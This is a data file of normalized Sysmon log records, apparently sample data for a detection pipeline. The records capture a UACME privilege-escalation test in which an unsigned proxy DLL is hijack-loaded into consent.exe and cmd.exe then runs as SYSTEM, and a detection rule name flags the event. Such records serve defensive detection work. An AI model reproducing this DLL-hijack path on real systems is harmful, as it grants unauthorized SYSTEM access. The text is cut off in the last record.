"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.9545970Z\"},\"EventRecordID\":\"5450\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:21.036\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7935-5d45-0000-001066ca0701}\"},{\"Name\":\"ProcessId\",\"text\":\"7324\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 7564 -s 152\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 7564 -s 152", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7935-5d45-0000-001066ca0701", "object.process.hash.imphash": 
"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "7324", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:21.036Z", "type": "raw", "uuid": "d6803be2-c89f-4b40-acdb-cf8c80989d3f" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.1282657Z\"},\"EventRecordID\":\"5449\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.686\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7564", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.686Z", "type": "raw", "uuid": "7b523ccd-78ce-4af3-8d35-9273f3f6a8da" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:20.7314164Z\"},\"EventRecordID\":\"5448\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.405\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010a2a40701}\"},{\"Name\":\"ProcessId\",\"text\":\"4964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": 
"747f3d96-7934-5d45-0000-0010a2a40701", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4964", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.405Z", "type": "raw", "uuid": "a47d229a-2311-48b1-a1ed-bdd13d9c59e0" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.9151203Z\"},\"EventRecordID\":\"5447\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.888\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7933-5d45-0000-0010227e0701}\"},{\"Name\":\"ProcessId\",\"text\":\"6000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7933-5d45-0000-0010227e0701", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", 
"object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "6000", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.888Z", "type": "raw", "uuid": "b0eb41f3-3f63-4905-ba70-8743cd7bce72" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.8880688Z\"},\"EventRecordID\":\"5446\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3680\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.877\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": 
"PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "subject.process.id": "4740", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.877Z", "type": "raw", "uuid": "96aa7248-d4dd-4f79-96d5-69b12da589c5" } 
-{ "action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.8537652Z\"},\"EventRecordID\":\"5445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001085ee0601}\"},{\"Name\":\"ProcessId\",\"text\":\"6388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 4740 -s 128\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 4740 -s 128", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001085ee0601", "object.process.hash.imphash": 
"3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "6388", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": 